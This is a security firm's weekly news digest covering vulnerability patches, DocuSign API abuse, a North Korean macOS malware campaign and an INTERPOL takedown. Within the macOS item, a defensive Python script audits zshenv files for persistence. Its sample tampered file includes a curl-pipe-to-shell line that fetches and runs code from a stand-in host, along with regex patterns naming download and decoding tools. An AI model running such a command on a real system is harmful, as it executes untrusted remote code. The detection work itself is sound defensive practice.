Weekly Security News – 11th November 2024

22,000 malicious servers disrupted, Google making MFA mandatory and DocuSign's API abused...

Welcome to this week’s Security News. We’ve collated the best articles from around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team, who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.

Vulnerabilities and Patches

Critical Zero-Click Vulnerability in Synology NAS Devices Needs Urgent Patching

Top network-attached storage (NAS) maker Synology has patched a critical severity vulnerability which could have allowed threat actors to remotely execute malicious code on affected endpoints. The vulnerability is tracked as CVE-2024-10443 and was found in DiskStation and BeePhotos. It was showcased during the recent Pwn2Own Ireland 2024 hackathon, where it was described as a zero-click flaw and dubbed RISK:STATION. A zero-click flaw is a security vulnerability that can be exploited without any interaction from the victim, such as clicking a link or opening an attachment. Attackers can use zero-click flaws to remotely compromise devices simply by sending a malicious message or file, making them particularly dangerous and difficult to detect. As the vulnerability can lead to device takeover, loss of data, and worse, the details have been withheld to give most users time to react and to prevent hackers from easily exploiting it. Since the patch is already available, users are advised to apply it immediately or risk losing sensitive data to threat actors.

HPE Aruba Networking Releases Critical Security Updates for Instant AOS-8 and AOS-10 in Access Points

Hewlett Packard Enterprise (HPE) Aruba Networking has issued an advisory that addresses 5 vulnerabilities affecting Aruba Access Point (AP) product lines that run Instant AOS (ArubaOS) 8 and 10. AOS is a distributed network operating system working with Aruba Central that controls APs and optional gateways. Two critical command injection vulnerabilities and three high severity vulnerabilities could be exploited by an attacker to achieve remote code execution (RCE). Successful exploitation could lead to the ability to execute arbitrary code as a privileged user on the underlying operating system. Software versions that are End of Support Life (EoSL) are also affected by these vulnerabilities and are not addressed by this advisory. HPE Aruba Networking strongly recommends that all customers running End of Support Life (EoSL) software upgrade to a supported version as soon as possible. Affected organisations are encouraged to review the HPE Security Advisories and apply any relevant updates or workarounds.

Cyber Attacks

DocuSign Abused to Deliver Fake Invoices

Attackers are exploiting DocuSign’s API capabilities to deliver fake invoices that bypass traditional security measures. By leveraging legitimate DocuSign accounts and API access, threat actors are sending carefully crafted invoices directly to targets’ inboxes, with messages that look convincingly authentic. DocuSign, a widely used digital platform for managing secure electronic agreements, has inadvertently become a tool for scammers through its API environment. APIs, or Application Programming Interfaces, allow developers to integrate DocuSign’s services into other applications and automate document workflows. By gaining access to DocuSign’s API, attackers with legitimate accounts can create and send documents that appear to be genuine invoices or payment requests. Emails coming directly from DocuSign’s platform are marked as legitimate because they are technically coming from a trusted source, effectively bypassing standard email protections. Furthermore, the emails often impersonate well-known brands or suppliers, creating invoices that appear to come from established businesses.

North Korean Hackers Target macOS Users

North Korean cryptocurrency thieves are once again targeting macOS users with a new malware campaign that uses phishing emails, fake PDF applications, and a novel technique to evade Apple’s security measures. According to fresh research from SentinelOne, the notorious BlueNoroff hacking team was caught sending phishing lures with fake news headlines or stories about crypto-related topics to targets at decentralized finance (DeFi) and cryptocurrency businesses. Inside the emails, the North Korean government-backed hackers embedded a malicious macOS application disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”. SentinelOne said the campaign, called ‘Hidden Risk’, also abuses the ‘zshenv’ configuration file to maintain persistence without triggering macOS Ventura’s background item modification notifications. The macOS notifications are designed to alert users to changes in common persistence methods like LaunchAgents and LaunchDaemons.
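Because zsh reads /etc/zshenv and $ZDOTDIR/.zshenv (default ~/.zshenv) on every shell start, including non-interactive ones, a periodic audit of those files is a cheap check for the persistence technique described above. The script below is an added example, not code from SentinelOne or the article; the heuristics and the sample file content are constructed for illustration and will need tuning to your environment.

```python
import os
import re
from pathlib import Path

# Heuristics for lines in a zsh startup file that warrant a closer look.
# Constructed for this example, not taken from the SentinelOne report.
SUSPICIOUS_PATTERNS = {
    "background_exec": re.compile(r"(?:&\s*$|\bnohup\b|\bdisown\b)"),
    "temp_dir_exec": re.compile(r"(?:/tmp/|/var/tmp/|/private/tmp/)"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    "decoded_payload": re.compile(r"\b(?:base64|xxd)\b.*\|"),
}

def candidate_zshenv_paths():
    """Files zsh sources on every start, so commands here run without a terminal."""
    zdotdir = Path(os.environ.get("ZDOTDIR", Path.home()))
    return [Path("/etc/zshenv"), zdotdir / ".zshenv"]

def audit_zshenv_text(text):
    """Return [(line_no, [tags], line)] for every line matching a heuristic."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments are never executed
        tags = [tag for tag, rx in SUSPICIOUS_PATTERNS.items() if rx.search(stripped)]
        if tags:
            findings.append((no, tags, stripped))
    return findings

def audit_zshenv_files(paths=None):
    """Audit each startup file that exists; returns {path: findings}."""
    results = {}
    for path in map(Path, paths or candidate_zshenv_paths()):
        if path.is_file():
            results[str(path)] = audit_zshenv_text(path.read_text(errors="replace"))
    return results

# Constructed sample of a tampered .zshenv, for demonstration only.
SAMPLE_ZSHENV = """# constructed sample
export PATH="$HOME/bin:$PATH"
. "$HOME/.cargo/env"
nohup /private/tmp/.upd >/dev/null 2>&1 &
curl -fsSL http://example.invalid/a | sh
"""

if __name__ == "__main__":
    for no, tags, line in audit_zshenv_text(SAMPLE_ZSHENV):
        print(f"sample line {no}: {', '.join(tags)}: {line}")
    for path, findings in audit_zshenv_files().items():
        print(f"{path}: {len(findings)} suspicious line(s)")
```

A finding is a prompt to read the file, not proof of compromise; legitimate tooling also edits .zshenv, so compare against a known-good copy or the file's modification time where you can.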

In Other News...

INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime

INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation. Dubbed Operation Synergia II, the coordinated effort ran from April 1 to August 31, 2024, targeting phishing, ransomware, and information stealer infrastructure. “Of the approximately 30,000 suspicious IP addresses identified, 76 per cent were taken down and 59 servers were seized,” INTERPOL said. “Additionally, 43 electronic devices, including laptops, mobile phones and hard disks were seized”. The actions also led to the arrest of 41 individuals, with 65 others still under investigation.

MFA to be Mandatory on All Google Cloud Accounts by 2025

Google is making multi-factor authentication mandatory by the end of 2025 for all Google Cloud accounts. The tech giant said in a recent announcement that it will begin the transition with a phased rollout to help users adapt more smoothly. “This shift is backed by strong evidence both from our own experience and from U.S. government agencies,” Google said. “The Cybersecurity and Infrastructure Security Agency (CISA) found that MFA makes users 99% less likely to be hacked, a powerful reason to make the switch”. The mandatory MFA requirement for Google Cloud will be introduced in three stages to smooth out the process for users and enterprises, starting this month and running until the end of 2025: Phase 1 – Encouragement and Awareness (beginning November 2024), Phase 2 – Notifications to Enable MFA (early 2025) and Phase 3 – Mandatory MFA Requirement (end of 2025). Google has developed a range of MFA options, including passkeys that leverage biometric data for a smoother and more secure experience.